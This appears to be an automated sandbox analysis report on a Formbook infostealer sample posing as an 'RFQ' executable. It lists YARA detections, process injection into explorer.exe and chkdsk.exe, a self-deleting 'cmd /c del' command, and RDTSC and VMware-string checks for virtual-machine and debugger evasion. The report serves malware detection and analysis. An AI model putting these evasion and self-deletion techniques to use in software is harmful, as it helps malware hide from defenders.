          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/7
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4972:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile created: C:\Users\user\AppData\Local\Temp\nsuBF4A.tmpJump to behavior
          Source: RFQ-BCM 03122020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RFQ-BCM 03122020.exeVirustotal: Detection: 20%
          Source: RFQ-BCM 03122020.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile read: C:\Users\user\Desktop\RFQ-BCM 03122020.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: chkdsk.pdbGCTL source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ-BCM 03122020.exe, 00000002.00000003.250609113.00000000098A0000.00000004.00000001.sdmp, RFQ-BCM 03122020.exe, 00000003.00000002.305161536.0000000000B50000.00000040.00000001.sdmp, chkdsk.exe, 0000000D.00000002.518417672.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ-BCM 03122020.exe, chkdsk.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeUnpacked PE file: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_73432F60 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004160DB push ebx; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004161D5 push esp; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041BB43 push dword ptr [353B5DC7h]; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041C339 push esi; retf
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00415EE1 push cs; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BCD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004160DB push ebx; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004161D5 push esp; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041BB43 push dword ptr [353B5DC7h]; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041C339 push esi; retf
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00415EE1 push cs; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001360DB push ebx; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001361D5 push esp; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013C339 push esi; retf
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B402 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B40B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B46C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013BE38 push dword ptr [353B5DC7h]; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_00135EE1 push cs; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile created: C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000001285E4 second address: 00000000001285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 000000000012897E second address: 0000000000128984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 1112Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1004Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.274241173.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.263827938.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.289137714.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.287405384.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.274720309.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.296397511.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.274720309.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
